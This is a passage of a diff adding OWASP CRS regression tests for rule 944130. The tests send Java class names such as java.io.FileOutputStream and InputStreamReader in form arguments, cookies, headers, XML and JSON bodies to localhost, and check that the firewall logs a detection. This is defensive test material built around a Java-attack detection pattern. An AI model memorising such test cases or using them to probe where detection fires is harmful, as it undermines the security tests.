includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-106 + desc: "XML element value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: 
"POST" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-107 + desc: "Nested XML element value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-108 + desc: "Content-Type text/plain includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-109 + desc: "Content-Type application/json arg value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FileOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-110 + desc: "Content-Type application/json arg name includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FileOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-111 + desc: "Argument test includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-112 + desc: "Argument name includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-113 + desc: "Cookie test includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-114 + desc: "Cookie name includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-115 + desc: "Request header test includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-116 + desc: "XML attribute value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - 
test_title: 944130-117 + desc: "XML element value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-118 + desc: "Nested XML element value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-119 + desc: "Content-Type text/plain includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-120 + desc: "Content-Type application/json arg value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-121 + desc: "Content-Type application/json arg name includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FilterInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-122 + desc: "Argument test includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-123 + desc: "Argument name includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + 
method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-124 + desc: "Cookie test includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-125 + desc: "Cookie name includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-126 + desc: "Request header test includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-127 + desc: "XML attribute value 
includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-128 + desc: "XML element value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-129 + desc: "Nested XML element value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-130 + desc: "Content-Type text/plain includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-131 + desc: "Content-Type application/json arg value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-132 + desc: "Content-Type application/json arg name includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FilterOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-133 + desc: "Argument test includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log_contains: "id 
\"944130\"" + - test_title: 944130-134 + desc: "Argument name includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-135 + desc: "Cookie test includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-136 + desc: "Cookie name includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-137 + desc: "Request header test includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-138 + desc: "XML attribute value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-139 + desc: "XML element value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-140 + desc: "Nested XML element value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterReader" + 
output: + log_contains: "id \"944130\"" + - test_title: 944130-141 + desc: "Content-Type text/plain includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-142 + desc: "Content-Type application/json arg value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-143 + desc: "Content-Type application/json arg name includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FilterReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-144 + desc: "Argument test includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS 
test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-145 + desc: "Argument name includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-146 + desc: "Cookie test includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-147 + desc: "Cookie name includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: 
java.io.InputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-148 + desc: "Request header test includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-149 + desc: "XML attribute value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-150 + desc: "XML element value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-151 + desc: "Nested XML element value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-152 + desc: "Content-Type text/plain includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-153 + desc: "Content-Type application/json arg value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-154 + desc: "Content-Type application/json arg name includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + 
method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.InputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-155 + desc: "Argument test includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-156 + desc: "Argument name includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStreamReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-157 + desc: "Cookie test includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStreamReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-158 + desc: "Cookie name includes keyword java.io.InputStreamReader" + stages: + 
